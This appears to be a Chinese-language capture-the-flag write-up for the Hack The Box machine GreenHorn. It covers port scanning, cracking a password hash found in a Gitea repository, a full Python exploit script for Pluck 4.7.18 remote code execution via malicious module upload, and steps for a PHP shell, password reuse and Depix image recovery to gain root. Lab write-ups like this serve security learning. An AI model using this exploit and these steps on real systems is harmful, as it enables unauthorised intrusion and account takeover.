HacktheBox-GreenHorn

信息搜集

1
fscan -h 10.10.11.25
1
2
3
4
5
6
7
8
9
10
11
12
start infoscan
(icmp) Target 10.10.11.25     is alive
[*] Icmp alive hosts len is: 1
10.10.11.25:22 open
10.10.11.25:80 open
10.10.11.25:3000 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://10.10.11.25        code:302 len:154    title:302 Found 跳转url: http://greenhorn.htb/
[*] WebTitle: http://10.10.11.25:3000   code:200 len:13904  title:GreenHorn
[+] InfoScan:http://10.10.11.25:3000   [Gitea简易Git服务]
[*] WebTitle: http://greenhorn.htb/?file=welcome-to-greenhorn code:200 len:2445   title:Welcome to GreenHorn ! - GreenHorn

http://10.10.11.25:3000/

一个 git 管理平台,注册一个账号进去,可以阅读到 GreenHorn 程序的源码:
Clip_2024-08-01_13-50-31.png
data\settings\pass.php里面像密码的东西被加密了。

1
2
3
<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online

hash 前是:iloveyou1
这个密码我没发现在哪里用。上网一查发现是那个greenhorn.htb/login.php,但是连这个页面都进不去。后面刷新环境才进去。
Clip_2024-08-01_14-30-39.png
然后搜下 nday,pluck 4.7.18

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 


import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

login_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}

file_path = input("ZIP file path: ")

multipart_data = MultipartEncoder(
    fields={
        "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
        "submit": "Upload"
    }
)

session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)


if login_response.status_code == 200:
    print("Login account")

 
    upload_headers = {
        "Referer": upload_url,
        "Content-Type": multipart_data.content_type
    }
    upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)

    
    if upload_response.status_code == 200:
        print("ZIP file download.")
    else:
        print("ZIP file download error. Response code:", upload_response.status_code)
else:
    print("Login problem. response code:", login_response.status_code)


rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"

rce=requests.get(rce_url)

print(rce.text)

根据 exp,是在 install module 这里上传 zip 文件,先构建 evil.zip ,就是单纯把恶意 php 文件放入 zip 中就行:

1
2
cat "xxx" >>> evil.php
zip evil.zip evil.php

上个 shell。
Clip_2024-08-01_15-05-55.png

user

反弹 shell,在这复制一个:

反弹shell工具

Clip_2024-08-01_15-08-38.png
Clip_2024-08-01_15-09-12.png
我们现在只是www-data权限,没法拿 userflag
home 文件夹下发现 junior用户,重用下先前的密码。
Clip_2024-08-01_15-11-08.png
Clip_2024-08-01_15-13-00.png
Clip_2024-08-01_15-25-05.png

root

pdf 修复

1
2
pip3 install --upgrade Pillow
python3 depix.py -p /home/kali/Desktop/Depix-main/output.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png

Clip_2024-08-01_15-26-07.png